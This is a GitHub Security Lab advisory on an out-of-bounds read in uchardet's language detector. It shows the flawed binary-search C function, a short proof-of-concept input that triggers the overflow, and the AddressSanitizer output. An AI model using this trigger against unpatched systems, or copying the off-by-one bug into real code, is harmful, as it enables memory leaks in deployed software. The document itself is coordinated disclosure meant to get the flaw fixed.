skip to content
Back to GitHub.com
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
August 21, 2023

GHSL-2023-105: Buffer Overflow in uchardet

Jaroslav Lobacevski

Coordinated Disclosure Timeline

Summary

A crafted sequence of bytes triggers memory read past the bounds of a globally allocated object buffer.

Product

uchardet

Tested Version

Master branch, post v0.0.8.

Details

Global buffer read overflow in GetOrderFromCodePoint (GHSL-2023-105)

The out of bounds read happens in GetOrderFromCodePoint [1] when i becomes equal to max. For example, in the PoC, initially max is set to 64 [2] (it is a half of the true size of the mModel->charOrderTable buffer). i is set to 32 [3]. The binary search in the loop increases the i until it reaches 63 in [4] and max is assigned to i. However in the next loop iteration the index i * 2 (64) [1] reads one integer out of the true buffer size (64).

int nsLanguageDetector::GetOrderFromCodePoint(int codePoint)
{
  int max = mModel->charOrderTableSize; // [2]
  int i   = max / 2; // [3]
  int c   = mModel->charOrderTable[i * 2];

  while ((c = mModel->charOrderTable[i * 2]) != codePoint) // [1] buffer read overflow
  {
    if (c > codePoint)
    {
      if (i == 0)
        break;
      max = i - 1;
      i = i / 2;
    }
    else if (i < max - 1)
    {
      i += (max - i) / 2;
    }
    else if (i == max - 1) // [4]
    {
      i = max; // [5]
    }
    else
    {
      break;
    }
  }

  return (c == codePoint) ? mModel->charOrderTable[i * 2 + 1] : -1;
}

Impact

This issue may be used to leak internal memory allocation information.

Resources

To reproduce the issue:

  1. Make ASAN build or set breakpoint with the condition i == 64 at while ((c = mModel->charOrderTable[i * 2]) != codePoint).
  2. Run the following program to hit the breakpoint or out of bounds access with ASAN:
    uchardet_t ud = uchardet_new();
    uchardet_handle_data(ud, "\xe6\xbc\xa2", 3);
    

The output when built with ASAN:

==13==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000006100a0 at pc 0x000000595025 bp 0x7ffc86d95830 sp 0x7ffc86d95828
READ of size 4 at 0x0000006100a0 thread T0
SCARINESS: 17 (4-byte-read-global-buffer-overflow)
    #0 0x595024 in GetOrderFromCodePoint /src/uchardet/src/nsLanguageDetector.cpp:254:15
    #1 0x595024 in nsLanguageDetector::HandleData(int const*, unsigned int) /src/uchardet/src/nsLanguageDetector.cpp:49:13
    #2 0x584dbd in nsMBCSGroupProber::HandleData(char const*, unsigned int, int**, int*) /src/uchardet/src/nsMBCSGroupProber.cpp:369:32
    #3 0x57e3cd in nsUniversalDetector::HandleData(char const*, unsigned int) /src/uchardet/src/nsUniversalDetector.cpp:275:34
    #4 0x5786ae in uchardet_handle_data /src/uchardet/src/uchardet.cpp:220:63

DEDUP_TOKEN: GetOrderFromCodePoint--nsLanguageDetector::HandleData(int const*, unsigned int)--nsMBCSGroupProber::HandleData(char const*, unsigned int, int**, int*)
0x0000006100a0 is located 0 bytes to the right of global variable 'Unicode_CharOrder' defined in '/src/uchardet/src/LangModels/LangArabicModel.cpp:110:27' (0x60fea0) of size 512
SUMMARY: AddressSanitizer: global-buffer-overflow /src/uchardet/src/nsLanguageDetector.cpp:254:15 in GetOrderFromCodePoint
Shadow bytes around the buggy address:
  0x0000800b9fc0: f9 f9 f9 f9 00 05 f9 f9 00 00 00 00 00 00 f9 f9
  0x0000800b9fd0: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b9fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800b9ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800ba000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0000800ba010: 00 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
  0x0000800ba020: f9 f9 f9 f9 00 00 00 00 00 00 00 f9 f9 f9 f9 f9
  0x0000800ba030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800ba040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800ba050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800ba060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==13==ABORTING

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-105 in any communication regarding this issue.